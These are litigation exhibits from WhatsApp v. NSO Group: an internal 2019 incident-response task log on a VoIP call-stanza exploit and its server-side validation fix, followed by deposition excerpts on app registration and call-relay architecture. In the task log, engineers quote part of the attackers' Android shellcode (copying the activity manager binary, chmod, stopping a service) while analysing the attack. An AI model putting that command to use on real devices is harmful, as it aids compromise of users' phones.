    **Joaquin Moreno Garijo** subscribed Jessica Romero and Drew Robinson
    **Jesus Barcons Palau** subscribed Jessica Romero
    **Joaquin Moreno Garijo** subscribed Tiana Demas
    **Jesus Barcons Palau** subscribed Despina Papageorge
    **Andrey Labunets** subscribed Jeremy Apple
    **Andrey Labunets** subscribed Aby John
    **Cortney Padua** subscribed Mark Hammell and Michael Scott
    **Ibrahim Mohamed** subscribed Dan Gurfinkel
    **Andrey Labunets** subscribed Hasan Eray Dogan
**Hide all changes...**

**Xi Deng** added attachment     logs2.zip
May 7, 2019

 **Xi Deng**


Attached logs logs2.zip which show "voicefgservice/onDestroy" after malicious connecting_tone without crash between. These may be potential success exploits.

May 7, 2019 · Like ·      1 · Reply · Edited

 **Xi Deng**

https://www.internalfb.com/intern/tasks/?t=34775320                                                                                                      17/22

Highly Confidential - Attorneys' Eyes Only                                                                                          WA-NSO-00017599

PTX-0013.0017

some are destroyed because peer rejects or accepts. Only 05/07's could be exploits. However, 05/07 may be their tests. All numbers are

6281293395095

6281380912612

6281380912613

6285215659697

6287771258524

May 7, 2019 · Like · Reply · Edited

**Jesus Barcons Palau** made several changes

May 7, 2019

marked this task as depending on T44020654: collect all the numbers affected by S178165

added D15248456: [voip_validation] Add validation for relayelection and transport stanzas.

subscribed John Altenmueller

**Hide all changes...**

**John Altenmueller** marked this task as depending on T44089969: finish voip stanza validation

May 7, 2019

 **YuanYuan Wang** Xi Deng voicefgservice/onDestroy() is also called at the end of the call, and if it's stopped by us, we would see "voicefgservice/stop-service", and "voicefgservice/onStartCommand:Intent { act=com.whatsapp.service.VoiceFgService.STOP cmp=com.whatsapp/.voipcalling.VoiceFGService (has extras) }" in the log, we would not see this log if the the service is stopped the the shell command

May 7, 2019 · Like · Reply

 **Xi Deng**

yes, None of voipfgservice onDestroy in crash logs are stopped by shell code. (They are triggered either by user accepts, rejects, camera errors or attacker terminates).

However, this doesn't prove that user is not exploited as my latest comment in workchat.

*Their shellcode could have an bug. It only works here when I replace*

*s="stopservice --user $u $w/.voipcalling.VoiceFGService;"*

*with*

*s="stopservice --user $u $w/.voipcalling.VoiceFGService"*

*So there might not be "voicefgservice/onDestory" log when exploit is success.*

May 7, 2019 · Like ·    1 · Reply · Edited

**Jesus Barcons Palau** added D15256060: [voip_validation] Promote video and group call offers from in-progress to checked.

May 7, 2019

Highly Confidential - Attorneys' Eyes Only

WA-NSO-00017600

PTX-0013.0018

10/21/2020                                        T34775320 | [Follow-up] Server to validate call stanzas as defined in the protocol | Tasks

 **YuanYuan Wang**

Xi, can you try to execute the shell command in java code

"w=com.whatsapp;t=/data/data/$w/files/t;e=echo;c=\"chmod 777\";g=grep;v=/system/bin/am;u=$(which id>/dev/null && $c $((`id | $g -oE \"uid=[0-9]+\" | $g -oE \"[0-9]+\"` / 100000)) || $e 0);cp $v ${t}p;s=\"stopservice --user $u $w/.voipcalling.VoiceFGService;\""

if it can generate the error log of "java.lang.SecurityException: Permission Denial: getCurrentUser() from pid=6533, uid=10198 requires android.permission.INTERACT_ACROSS_USERS", then maybe this is the indicator of successful attack in the log.

May 8, 2019 · Like · Reply · Edited

**Jesus Barcons Palau** added D15264931: Logging IP of clients that fail VoIP stanza validation.

May 8, 2019

**Aby John** marked this task as blocking T44191245: Master task for SEV S178165

May 9, 2019

**Aby John** marked this task as not blocking T44191245: Master task for SEV S178165

May 9, 2019

**Aby John** marked this task as blocking T44191245: Master task for SEV S178165

May 9, 2019

**Claudiu Gheorghe** marked this task as not depending on T44019656: log all the large RTCP packets in edgeray, T44019169: log all the packets from particular JIDs for investigation, T44020654: collect all the numbers affected by S178165 and T44020385: crashlog: find similar crashes from S178165 in the past

May 9, 2019

 **Claudiu Gheorghe** to give an update on this one, we have most of the stanza validation pushed, and the server is here as well. Jesus - can you clarify which is the diff considered "the fix" now and what's the method of enabling the fix?

May 9, 2019 · Like · Reply

**Xi Deng** added attachment        whatsapp-2019-05-07.1....

May 9, 2019

 **Xi Deng**

May 9, 2019 · Like · Reply

 **Jesus Barcons Palau**

Once chatd deployment is completed, we'll have validation for the following stanzas:

https://www.internalfb.com/intern/tasks/?t=34775320                                                                    19/22

Highly Confidential - Attorneys' Eyes Only                                                              WA-NSO-00017601

PTX-0013.0019

T34775320 | [Follow-up] Server to validate call stanzas as defined in the protocol | Tasks

- audio_video_switch
- call_offer
- call_accept
- direct_group_call_offer
- enc_rekey
- group_call_offer
- relaylatency

When we enable blocking, the above stanzas will be dropped and the sender will receive an error.  These stanzas include the "dangerous" ones, since they allow to inject voip settings that the receiver can consume.

The following stanzas are currently being "canaried".  They bump counters and are being logged, but will not be dropped since we don't have full confidence yet:

- interruption
- mute
- notify
- relayelection
- transport
- flowcontrol
- preaccept

The remaining stanzas to be validated are:

- terminate
- group call accept
- group call receipt
- group call reject
- group call terminate
- group call peer state
- group call preaccept

- group call mute
- group call ???

We'll continue working on it so we have validation for all of them.  Maybe I'm missing some stanzas, we'll count what we are missing once we have validation for all of the above.

May 9, 2019 · Like ·      6 · Reply

https://www.internalfb.com/intern/tasks/?t=34775320

Highly Confidential - Attorneys' Eyes Only

WA-NSO-00017602

PTX-0013.0020

10/21/2020                                    T34775320 | [Follow-up] Server to validate call stanzas as defined in the protocol | Tasks

**Jesus Barcons Palau** made several changes

May 13, 2019

> added D15306712: Also log to Scuba UUID of call offer that fails validation.
> added D15321226: [voip_validation] Promoting some stanza validation from ?IN_PROGRESS to ?CHECKED.
> added D15332007: [chatd_c2s] Also log to Scuba VoIP stanzas that are sent by emulators.

**Hide all changes...**

**Claudiu Gheorghe** subscribed Edward George

May 22, 2019

**Claudiu Gheorghe** closed the task and made several other changes

May 23, 2019

> changed the progress from `In Progress` to `Closed`
> closed the task

**Hide all changes...**

**Claudiu Gheorghe** nothing left here to be done except finishing up the stanza validation which is tracked here: https://our.intern.facebook.com/intern/tasks/?t=44847508

May 23, 2019 · Like · Reply

Paul Otto, Elly Bingaman and Carl Woog were subscribed

June 20, 2019

> **Otto Ebeling** subscribed Carl Woog
> **Tiana Demas** subscribed Paul Otto
> **Tiana Demas** subscribed Elly Bingaman

**Hide all changes...**

**Claudiu Gheorghe** subscribed Michael Kearney

June 27, 2019

**Tiana Demas** subscribed Chris Puntarelli

October 22, 2019

**SEV Manager** "IM Review Action Item" tag has been re-added since this task is still associated with S178165, If this task is no longer related to this SEV, please unmark it from SEV Manager before removing the tag."

September 23, 10:50 AM · Like · Reply

**SEV Manager** made several changes

September 23, 10:50 AM

https://www.internalfb.com/intern/tasks/?t=34775320                                                                21/22

Highly Confidential - Attorneys' Eyes Only

WA-NSO-00017603

PTX-0013.0021

10/21/2020                                                     T34775320 | [Follow-up] Server to validate call stanzas as defined in the protocol | Tasks

added tag  SEV Task

added tag  SEV Task

**Hide all changes...**

SEV Manager was subscribed

September 23, 10:50 AM

> **SEV Manager** subscribed SEV Manager
>
> **SEV Manager** subscribed SEV Manager

**Hide all changes...**

**SEV Manager** "IM Review Action Item" tag has been re-added since this task is still associated with S178165, If this task is no longer related to this SEV, please unmark it from SEV Manager before removing the tag."

September 23, 10:50 AM · Like · Reply

**Jesus Barcons Palau** subscribed Patrick Jette

3 hrs

https://www.internalfb.com/intern/tasks/?t=34775320                                                          22/22

Highly Confidential - Attorneys' Eyes Only                                              WA-NSO-00017604

PTX-0013.0022

# EXHIBIT 2

Case: 25-7380, 05/13/2026, DktEntry: 36.1, Page 138 of 157
Case 4:19-cv-07123-PJH   Document 401-2   Filed 09/27/24   Page 3 of 112

WhatsApp Inc. vs NSO Group Technologies Limited et al.                    Job 3385
JONATHAN LEE on 09-25-2024          {{Attorneys Eyes Only}}               Page 1

Page 1

UNITED STATES DISTRICT COURT

NORTHERN DISTRICT OF CALIFORNIA

OAKLAND DIVISION


WHATSAPP INC., a Delaware      )
corporation, and FACEBOOK,     )
INC., a Delaware corporation,)
                               )
          Plaintiffs,          )
                               )
     vs.                       )   Case No.
                               )   4:19-cv-07123-PJH
NSO GROUP TECHNOLOGIES          )
LIMITED and Q CYBER            )
TECHNOLOGIES LIMITED,          )
                               )
          Defendants.          )
_____  )




HIGHLY CONFIDENTIAL-ATTORNEYS' EYES ONLY

VIDEOTAPED 30(B)(6) DEPOSITION OF JONATHAN LEE

LOS ANGELES, CALIFORNIA

WEDNESDAY, SEPTEMBER 25, 2024






SWIVEL LEGAL SOLUTIONS
JOB NO.: 3385
DORIEN SAITO, CSR 12568, CLR

Case: 25-7380, 05/13/2026, DktEntry: 36.1, Page 139 of 157

Case 4:19-cv-07123-PJH   Document 401-2   Filed 09/27/24   Page 4 of 112

WhatsApp Inc. vs NSO Group Technologies Limited et al.                     Job 3385
JONATHAN LEE on 09-25-2024          {{Attorneys Eyes Only}}          Pages  174..177

Page 174

how did decompiler work, so I also don't know how it would work prior to registration.

BY MR. AKROTIRIANAKIS:

Q. Okay. So you download the app. Then what's the next step if you wanted to register for an WhatsApp account?

MR. BLOCK: Objection to scope.

THE WITNESS: You would download the app. You would open the app, and you'd be shown a welcome screen. The welcome screen includes links to the term of service and the privacy policy. The user is then given the opportunity to agree to the terms of services and continue with the registration flow.

If the user chooses to agree to the terms of service and continue, they're given the opportunity to enter their phone number that they'll be associating with the WhatsApp account. There's a verification process for that phone number, most commonly done by an SMS message sent to that phone number, after which the account is created, if the verification is successful.

BY MR. AKROTIRIANAKIS:

Q. Have you done this yourself?

A. I use WhatsApp, and in order to use WhatsApp, I had to register my account.

Page 175

Q. Right.

But you're not testifying from your memory from the time when you registered a WhatsApp account; am I; right?

A. Correct. As we discussed earlier, I spoke with two internal experts about the process to do this.

Q. And those are the steps that they explained to you?

A. They are.

Q. Okay. So at what point do you -- after downloading the app and before or during the process that you have now described would you, for example, select a language?

MR. BLOCK: Objection to form and scope.

THE WITNESS: I don't know specifically when that happens. My recollection from the conversations that I had yesterday were that the app looks to the language settings of the phone in order to surface the -- the language -- the relevant language.

BY MR. AKROTIRIANAKIS:

Q. So is your testimony on behalf of WhatsApp and Facebook that you don't have to select a language? It selects it for you?

Page 176

MR. BLOCK: Objection to form. And this is outside the scope of the topic.

But you can answer in personal capacity.

Hang on one second.

Sorry for the -- I think I objected on form and scope.

And if you have knowledge in your personal capacity, you can answer.

THE WITNESS: I don't know whether or not a user has the opportunity to select their language in WhatsApp is part of their registration flow.

BY MR. AKROTIRIANAKIS:

Q. Now earlier, when you testified about the explanations you were given yesterday -- well, let me back up.

The explanations that you were given yesterday, is that the sole basis for your -- your ability to testify today as to the process by which users in Israel could accept terms of service in 2018, 2019, 2020?

A. In my capacity answering these questions, yes.

Q. Okay. And do you recall, you know, did you review any, like, progression of screens or anything like that during your -- during your preparation to

Page 177

testify?

A. In my preparations for this, on this issue, these were described to me verbally.

Q. Okay. So some person just told you, and now you're doing your best to parrot what you were told yesterday?

MR. BLOCK: Objection to form.

THE WITNESS: As part of the preparations I spoke with two people, one of whom is the product manager who leads this particular set of product experiences for WhatsApp. He described them to me, and I am describing them to the best of my recollection based on my preparation.

BY MR. AKROTIRIANAKIS:

Q. All right. Is there any, like, depiction of the terms and service in any of the screens that you have to go through in order to register a WhatsApp account?

MR. BLOCK: Foundation. Scope.

You can answer, if you know.

THE WITNESS: The terms of service are presented -- are presented by a link -- a hyperlink which a user could choose to click through in order to read the terms of service.

///

Page 178

BY MR. AKROTIRIANAKIS:

Q.  And not to click through.

MR. BLOCK:  And sorry.  I had misunderstand the previous question.  I think it was fairly in scope.

THE WITNESS:  It's not a requirement that a user click through the terms of service in order to decide whether or not to accept and continue.

BY MR. AKROTIRIANAKIS:

Q.  And there's no separate box to check "I accept terms of service."

Correct?

MR. BLOCK:  Objection to form.

THE WITNESS:  I believe the box is accept --

MR. CRAIG:  (Sneezing.)

BY MR. AKROTIRIANAKIS:

Q.  But you think there's a box?

A.  That is what I recall from my preparation.

Q.  Have you used other apps in your lifetime other than WhatsApp?

MR. BLOCK:  This is outside the scope.

But you can answer in your personal capacity.

THE WITNESS:  I have used apps other than

Page 179

WhatsApp.

BY MR. AKROTIRIANAKIS:

Q.  Yeah.  Hundreds, probably.  At least dozens?

A.  I have used a number of apps that are not WhatsApp.

Q.  And you know that in some cases, the click -- the clickwrap accepting of terms of service requires you to scroll through the terms of service, and at least pretend you're reading it; right?

MR. BLOCK:  Foundation.  Scope.  Calls for a legal conclusion.

THE WITNESS:  In my experience using other apps, I have experienced apps or other online services where I have, as part of the registration flow or the flow to access the app, been required to scroll through a document before it enabled me to click "accept."

BY MR. AKROTIRIANAKIS:

Q.  Okay.  And there's nothing like that with WhatsApp; right?

MR. BLOCK:  Object to form.  Mischaracterizes.

THE WITNESS:  As I say earlier, the WhatsApp registration flow does not require the user

Page 180

to click through the terms of service, or to scroll through a document after clicking through it.

BY MR. AKROTIRIANAKIS:

Q.  But you think that in 2018, 2019, and 2020, it did require clicking a box?

A.  My understanding based on the preparation is that in order to proceed with the registration flow, you have to click a button of some sort -- whether that's a box or a button, I don't know the specific shape -- but in order to demonstrate agreement of the terms of service, and to continue with the registration process.

Q.  Could it just be clicking on a link?

MR. BLOCK:  Objection to form.

THE WITNESS:  Could you clarify what you mean by "link" there?

BY MR. AKROTIRIANAKIS:

Q.  Well, like, a box would be a little square, maybe, that you have to put a checkmark in or click your pointer in that box; right?

MR. BLOCK:  Objection to form.

THE WITNESS:  Yeah.  Again, as I said, I don't know the shape of the particular box or button that a user had to -- would have to click in order to proceed, but the user would have to click to

Page 181

demonstrate acceptance of the terms in order to continue the registration flow.

BY MR. AKROTIRIANAKIS:

Q.  So for all you know, it could say, "Click here," and "here" is underscored, and it's a link to accept the terms of service?

MR. BLOCK:  Objection to form.

THE WITNESS:  Link wouldn't be the -- the term that we would use in that context.  If you are clicking something to proceed in a flow, for instance, we would generally call that a "button."

BY MR. AKROTIRIANAKIS:

Q.  Okay.  The entirety of your knowledge of what you're testifying to is -- is based 100 percent on these conversations you had with other WhatsApp employees yesterday, September 24, 2024; correct?

MR. BLOCK:  Objection to form.

THE WITNESS:  As I mentioned, I personally use WhatsApp, although it's been quite some time since I registered for the service.  So I'm basing this testimony almost entirely on the preparation that I conducted yesterday.

BY MR. AKROTIRIANAKIS:

Q.  Well, you never registered for WhatsApp in Israel, I take it; right?

Page 318

PAGE   LINE   CHANGE/ADD/DELETE

_____  _____ _____

_____  _____ _____

_____  _____ _____

_____  _____ _____

_____  _____ _____

_____  _____ _____

_____  _____ _____

_____  _____ _____

_____  _____ _____

_____  _____ _____

_____  _____ _____

_____  _____ _____

_____  _____ _____

_____  _____ _____

_____  _____ _____

_____  _____ _____

_____  _____ _____

_____  _____ _____

_____  _____ _____

_____  _____ _____

_____  _____ _____

_____  _____ _____

_____  _____ _____

Deponent's Signature _____ Date

Page 319

CERTIFICATE OF REPORTER

I, DORIEN SAITO, CSR 12568, CLR, a certified Shorthand reporter in and for the State of California, County of Los Angeles, do hereby certify;

That JONATHAN LEE, the witness named in the foregoing deposition, was, before the commencement of the deposition, duly administered an oath in accordance with CCP 2094;

That said deposition was taken down in stenograph writing by me and thereafter transcribed into typewriting under my direction.

That before completion of the deposition, review of the transcript [ ] was [x ] was not requested.  If requested any changes made by the deponent (and provided to the reporter) during the period allowed are appended hereto.

I further certify that I am neither counsel for nor related to any party to said action, nor in any way interested in the outcome thereof.

Dated this 26th day of September, 2024.

*Dorien Saito*
_____
CERTIFIED SHORTHAND REPORTER
IN AND FOR THE COUNTY OF
LOS ANGELES, STATE OF CALIFORNIA

# EXHIBIT 4

# REDACTED VERSION OF DOCUMENT SOUGHT TO BE SEALED

Case 4:19-cv-07123-PJH   Document 401-2   Filed 09/27/24   Page 14 of 112

Page 1

UNITED STATES DISTRICT COURT

NORTHERN DISTRICT OF CALIFORNIA

OAKLAND DIVISION

_____

WHATSAPP INC., a Delaware                )
corporation, and FACEBOOK, INC.,         )
a Delaware corporation,                  )
a Delaware corporation,                  )
                                         )
          Plaintiffs,                    )
     v.                                  ) Case No.
                                         ) 4:19-cv-07123-PJH
NSO GROUP TECHNOLOGIES LIMITED            )
and Q CYBER TECHNOLOGIES LIMITED,         )
                                         )
                                         )
          Defendants.                    )
_____)

HIGHLY CONFIDENTIAL--ATTORNEYS' EYES ONLY

VIDEO-RECORDED 30(b)(6) and 30(b)(1)

DEPOSITION OF

WHATSAPP INC., by and through its Designated

Representative,

CLAUDIU GHEORGHE

Palo Alto, California 94304

Friday, August 16, 2024

Reported Stenographically by:
MARY J. GOFF
CSR No. 13427
WA CSR No. 21030779
Job No. 3296
PAGES 1-295

Case: 25-7380, 05/13/2026, DktEntry: 36.1, Page 144 of 157
Case 4:19-cv-07123-PJH   Document 401-2   Filed 09/27/24   Page 22 of 112
WhatsApp Inc. vs NSO Group Technologies Limited et al.
WHATSAPP INC. on 08-16-2024        {{Attorneys Eyes Only}}        Job 3296
Pages 114..117

Page 114

A   So these are concurrent.  So as soon as the caller receives -- the -- the callee receives the offer, as soon as it's processed and it starts ringing in the same time, it also sends back a confirmation to the server that it started ringing.

And I don't recollect specifically the name of that stanza, but I think it's a -- I think it's an offer ACK that is being sent.

Q   (BY ATTORNEY WEINBERG) Okay.  What then does the chatdserver do once it receives this offer ACK?

A   I think what it does is it forwards the ACK to the call so that the caller can also start the ring -- the ringing process.

Q   Have you heard the term "offer" -- sorry -- "Answer stanza"?

A   Yes.

Q   I saw it in some of the documents.

What is it is Answer stanza?

A   The Answer stanza, I believe, is the stanza that is sent from the callee at the moment the user presses the "Answer" button and accepts the call.

Q   All right.  So at our current step, the chatdserver sent the offer ACK back to the -- to the

Page 115

caller; and now if the callee picks up the phone, his device will send an Answer stanza somewhere?

A   To the chatd.

ATTORNEY BLOCK:  Objection to form.

Q   (BY ATTORNEY WEINBERG) The caller, once the caller picks up the phone, the caller's phone will send an Answer stanza back to the chatdserver, right?

ATTORNEY BLOCK:  Object to form.

A   The caller will send back an answer when the user presses the "Answer" button, yes.

ATTORNEY BLOCK:  Did you say "caller" or "callee" on that one?  I got confused.

Q   (BY ATTORNEY WEINBERG) The callee would send the answer?

ATTORNEY BLOCK:  I think we have got testimony about the "caller" sending an answer stanza.

ATTORNEY AKROTIRIANAKIS:  I'm sure she is going to have to listen when she goes through it, I hope.

A   Yeah, that's not accurate.  So the answer is only sent by the callee.

Q   (BY ATTORNEY WEINBERG) Got it.  All right.  At that point is there a peer-to-peer connection

Page 116

established?

A   No.

ATTORNEY BLOCK:  Objection to form.

Q   (BY ATTORNEY WEINBERG) Okay.  So what happens next?

A   Even before the answer happens, there's a negotiation process between the caller and the callee about the latency, about the bandwidth that is going to be used.  So all that negotiation happens before there's any -- any answer.

Q   Okay.  So then I'll go back one step.

The chatdserver sent the offer ACK to the caller and now a negotiation process begins, you say?

ATTORNEY BLOCK:  Objection to form.

A   Sorry.  So the -- the caller -- can you repeat the last part?

Q   (BY ATTORNEY WEINBERG) The callee sends an acknowledgment back to the chatdserver, the offer acknowledgment, and what happens next?

You talked about a negotiation process.

ATTORNEY BLOCK:  Objection to form.

A   The chat server will forward the offer ACK or send another stanza that I don't remember its name.  But it would signal to the callee, the fact

Page 117

that the caller has been reached and the offer was ACK'd by the callee.

And once they both know that -- both -- they know about each other, that they're aware that there's a call happening, this is when the -- the relay and bandwidth negotiation starts happening.

Q   (BY ATTORNEY WEINBERG) Okay.  Tell me about what you mean by "the relay and bandwidth negotiation."

ATTORNEY BLOCK:  Objection to form.

A   About each of them or --

Q   (BY ATTORNEY WEINBERG) I just want to know the steps that are involved in the negotiation process that you just mentioned.

ATTORNEY BLOCK:  Objection to form.

Wait for a question.

Q   (BY ATTORNEY WEINBERG) What are the steps of the negotiation process you just mentioned?

ATTORNEY BLOCK:  Objection to form.

A   About what negotiation?

Q   (BY ATTORNEY WEINBERG) You testified that the chatdserver sends the offer ACK back to the caller.

And after that happens and the two -- the caller and the callee know that they are now ready

Case: 25-7380, 05/13/2026, DktEntry: 36.1, Page 145 of 157

Case 4:19-cv-07123-PJH   Document 401-2   Filed 09/27/24   Page 23 of 112

WhatsApp Inc. vs NSO Group Technologies Limited et al.
WHATSAPP INC. on 08-16-2024          {{Attorneys Eyes Only}}

Job 3296
Pages  118..121

**Page 118**

to communicate, a negotiation process begins wherein the caller and callee negotiate the relay and bandwidth parameters.

I would like to understand, if you could explain to me, what that negotiation entails.

ATTORNEY BLOCK:  Objection to form; misstates.

A   So this negotiation, the relay negotiation, starts by every -- both caller and callee probing -- reaching all the relays in the list of relays that were distributed by the chat server.

Q   (BY ATTORNEY WEINBERG) Sorry.  Say that again.

A   So both caller and callee will attempt connecting to every relay in the list of relays that they both -- they were both given by the signaling server.

Q   Okay.  What's next?

A   This process is done not just by the IP address, but also by an authorization token that is unique to the call.  So both caller and callee will be passed a unique authorization token to use only those specific relays.

And using the token, both the caller and

**Page 119**

callee attempt to connect to every relay in that list using the authorization token.

Q   Okay.  So to rephrase what you said, the chatdserver provides a list to the two clients of relay servers and provides them authentication credentials, and each one tries to connect to the -- to all of the relay servers provided to them by the chatdserver?

A   Authorization token.

ATTORNEY BLOCK:  Objection to the form; misstates.

A   Authorization token.  It's only authorization.  It's not authentication.

Q   (BY ATTORNEY WEINBERG) Okay.  Tell me -- what is that authorization token?

A   So the relay server is designed in a way that it does not perform advanced authentication of the devices that send data to it.

It operates at a lower security level where the only thing that it does is validates an authorization token that has a low expiration time.

So as long as you have a valid token, you can use the relay.  So that is authorization for authentication, but we don't -- we don't authenticate the users of the relay.

**Page 120**

Q   (BY ATTORNEY WEINBERG) Okay.  What is the purpose of trying to connect to all those relays?

A   The purpose of connecting to the relays is firstly to see which one is available; and second, to measure the latency to each of them.

Q   Let me ask: How does the chatdserver decide which relay servers to give to these two clients?

ATTORNEY BLOCK:  Object to form.

A   The decision to pick -- to select the list of relays is based on latency measurements.  And the information that it uses is the caller IP address and the last seen IP of the callee.

The algorithm that we used at that time was essentially to find the top three of each -- based on each IP address, and we merged the list so that the sum of the latency is -- is the lowest.

So we choose the top lowest latency sum in that merged list of the relays, and that's the one that we delivered to both of them.

Q   (BY ATTORNEY WEINBERG) Okay.  So the chatdserver chooses which relay servers the clients should attempt to connect to?

ATTORNEY BLOCK:  Object to form.

Q   (BY ATTORNEY WEINBERG) I think you just

**Page 121**

got done saying that?

A   Yes, the chatdservers decide that.  Yes.

Q   Okay.  And then there's a second choice, evidently, that you talked about just before this where the clients connect to this list of relay servers and then they -- each one decides which one of the connections to then use; is that --

A   I think it's a little confusing -- there's some confusion in there, so let me clarify.

Q   Sure.

A   Both the server -- both the signaling server and the clients make a decision in this process.  It's a hybrid decision.

So the server picks the top five, let's say, or three.  But in the end, each client picks its own, like, relay to use, and that's just one.  But the client decides that based on the short list.

Q   Do the two clients have to agree on a specific relay server to use?

A   They don't.  The -- the network paths are completely asynchronous and, like, they don't need to be the same.

So the packets -- if I initiate a voice video call to you, the packets that I sent to you don't need to take the same network path that

Case: 25-7380, 05/13/2026, DktEntry: 36.1, Page 146 of 157
Case 4:19-cv-07123-PJH   Document 401-2   Filed 09/27/24   Page 24 of 112
WhatsApp Inc. vs NSO Group Technologies Limited et al.                    Job 3296
WHATSAPP INC. on 08-16-2024          {{Attorneys Eyes Only}}              Pages 130..133

Page 130

A   I'm not sure what you mean by "the parts of the server."

Q   (BY ATTORNEY WEINBERG) Areas in storage.

ATTORNEY BLOCK:  Same objection.

A   What storage?

Q   (BY ATTORNEY WEINBERG) Well, computers have computer storage, right?  Memory?  Hard drives?

A   So the chat servers do not store information on, like, themselves.

Q   When a computer operates, it accesses memory, right?

A   Yes.

Q   Okay.  The chatdservers have memory that they access?

A   Yes.

Q   And when they execute, they access that memory?

A   Yes.

Q   And so when they execute code written by WhatsApp, they access only those parts of the memory that WhatsApp had programmed them to access?

ATTORNEY BLOCK:  Objection to form.

A   Yes.

ATTORNEY BLOCK:  I just want to do a time check.  You had talked about --

Page 131

ATTORNEY WEINBERG:  Do you want to do lunch?

ATTORNEY BLOCK:  -- it's 12:45 now.

A   Yeah, I can probably -- I mean, it's up to guys as well.

ATTORNEY BLOCK:  Do you mind if we break?

ATTORNEY MARZORATI:  Yeah, let's do lunch.

A   No.

ATTORNEY WEINBERG:  Let's go off the record.

THE VIDEOGRAPHER:  12:45 p.m.

(A break was taken from 12:45 p.m. to 1:49 p.m.)

THE VIDEOGRAPHER:  We are back on the record at 1:49 p.m.

Q   (BY ATTORNEY WEINBERG) All right.  Thanks.  Welcome back from lunch.  Just a few cleanup items of some of the topics we spoke about earlier today.

The -- we spoke about the servers, the physical and logical servers and the whole infrastructure for routing messages in WhatsApp's VoIP infrastructure.  You spoke about the edge load balancers.

I just want to confirm:  How many -- in 2019, how many servers were there that were

Page 132

performing this edge load balancing?

A   Are you referring to how many locations, like, clusters or logical servers or how many physical servers?

Q   So let's start with the locations.

A   From my understanding, it was somewhere -- the number of locations was around a hundred.

Q   And where were those locations?

A   So the locations are basically Internet exchange points on the Internet.  And they're geographically distributed, so they're essentially in many countries, continents, all over the globe.

Q   And how many servers were implementing that edge load balancing layer?

ATTORNEY BLOCK:  Objection to form.

A   I don't remember exactly how many servers we had in total in all these edge locations.  I just know that in general the number was somewhere between 32 and a 120.

Like, some of them even had 200 servers in them, so I don't know the total number.

Q   (BY ATTORNEY WEINBERG) Okay.  And these hundreds of locations, were any of them in California?

A   Some of them are in California -- were in

Page 133

California.

Q   In 2019?

A   In 2019, yes.

Q   Do you have an approximation of about how many?

A   Two.

Q   Two.

Two total locations in California out of the 100?

A   Yes.

Q   Okay.  Are those data center locations?

A   Edge locations.  Not data centers.

Q   Okay.  So as far as the data centers, how many data centers did WhatsApp utilize in 2019?

A   From my recollection, we had -- WhatsApp had three data centers all located in the United States in 2019 for chat.

Q   And where were they?

A   One of them was Altoona.  The other one was in Virginia.  And then there was another one in New Mexico, I believe.

Q   Altoona, that's --

A   That's in Iowa.

Q   -- Iowa?

A   Yeah.

Page 134

Q   Any others?

A   Not from what I remember.

Q   Okay.  So we spoke about the chatdservers and the relay servers.  I'll start with the chatdservers.

Where were they implemented?  The computers that executed the chatd functionality, where were they located?

A   They were located in the data centers that we just mentioned.

Q   Okay.  And the relay servers, were they also located in the data centers we just mentioned?

A   No.

Q   Okay.  Where were they located?

A   The relay servers were located in the edge locations that we talked about earlier.

Q   And those edge locations are the 100 locations, including the two in California?

A   Yes.

Q   Okay.  In order to access one of these servers, for example, the chatdserver or the relay servers or one of these load balancing servers, there is presumably some kind of either authorization or authentication that occurs?  Yes?

ATTORNEY BLOCK:  Object to form.

Page 135

A   Would you want to be more specific with regards to, like, what authorization --

Q   (BY ATTORNEY WEINBERG) Sure.  Let's start with the load balancers.  All right.

The edge load balancers, when it receives a request, will it process it automatically or will it check for some kind of authorization?

ATTORNEY BLOCK:  Object to form.

A   The edge location, in case of the relay, it will check the author -- authorization token in the STUN message that is sent by the client.

And if that token is not valid, it will not allow the use of the relay.

Q   (BY ATTORNEY WEINBERG) And that's those temporary tokens that don't do authorization -- I'm sorry -- that don't do authentication --

A   Exactly.

Q   -- but instead do authorization?

A   Exactly.

Q   And what about the chatdservers?  What kind of credentials are required for accessing the functionality implemented by the chatdservers?

ATTORNEY BLOCK:  Objection to form.

A   The chatdservers -- and just to be clear, we're talking about the servers in the data centers

Page 136

now, not in the edge locations?

Q   (BY ATTORNEY WEINBERG) Are the chatdservers in the edge locations?

A   No.

Q   So then the chatdservers in the data centers?

A   In the data centers, which is only load balancers in the edge locations.

And those will not perform authentication for the chat traffic.  The authentication happens on the chat servers inside the data centers.

And it's based on -- it's a proprietary protocol -- it's the noise protocol that essentially provides both encryption and authentication at the same time.

Q   Okay.  Tell me about this authentication protocol for accessing the chatdservers.

ATTORNEY BLOCK:  Object to form.

A   What specifically do you want to know about it?

Q   (BY ATTORNEY WEINBERG) What is the form of the credentials?

A   In a simplified way, the credential is essentially an identity key that's stored on the client device.

Page 137

Q   And the client passes it along with every request that it makes to the chatdserver?

A   It doesn't.  It's more complicated.

Q   Okay.  Tell me --

A   It's -- it's part of the handshake -- the initial handshake that it does with the chatd.  But from that point on, it uses a preshared key to -- it uses a negotiated shared key to encrypt the rest of the traffic.

Q   Got it.  How are the original credentials obtained?

A   The credentials are obtained through the registration process to WhatsApp.

Q   Okay.  And what does WhatsApp then send the user that constitutes these credentials?

ATTORNEY BLOCK:  Object to form.

A   I'm not sure what you mean by "what does it send to users."

Q   (BY ATTORNEY WEINBERG) When the user needs to authenticate the chatdservers, it needs to provide some kind of authenticating information, so I'm asking:  What does WhatsApp provide the client to help it authenticate those requests?

ATTORNEY BLOCK:  Object to form.

A   So in order to validate -- to

WhatsApp Inc. vs NSO Group Technologies Limited et al.                    Job 3296
WHATSAPP INC. on 08-16-2024          {{Attorneys Eyes Only}}        Pages  138..141

Page 138

authenticate, the WhatsApp server sends an activation code to verify that the person who initiates the registration process has ownership over the phone number.

And it's over SMS.  So we'll send the code over SMS.  In using that code, the client can finish the registration process.  And after that is finished, the credentials are being admitted.

But just to be clear, that identity key that I was talking about is never seen by the server.  It's the basis of the internal encryption.  So the identity key -- identity key is never -- does not -- does never leave the client device.

Q   I'm not sure that I followed all of that.

The identity key is -- how does it arrive at the client device?

ATTORNEY BLOCK:  Objection to form.

A   It is generated -- like, it is generated locally by the client device before the registration starts and when someone installs the app on their phone.

Q   (BY ATTORNEY WEINBERG) So the client creates its own identity key kind of like a private key?

ATTORNEY BLOCK:  Object to form.

Page 139

A   You can refer to it as a private key, yes.

Q   (BY ATTORNEY WEINBERG) Okay.  And how does it use that private key to authenticate to the chatdserver?

A   It is a complex protocol which is part of what noise does, but it's essentially a key to there.

So there's a public key and a private key.  The public key is what is sent to the server so the server can verify that the client is indeed who -- who they claim they are.

